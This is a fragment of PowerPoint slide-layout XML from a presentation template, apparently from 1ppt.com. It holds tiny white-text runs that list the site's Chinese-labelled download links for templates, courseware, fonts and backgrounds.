              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout132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32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32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32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3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33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33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33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33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33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33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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout133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33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33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33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3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34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34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34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34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34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34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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout134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34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34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34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3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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
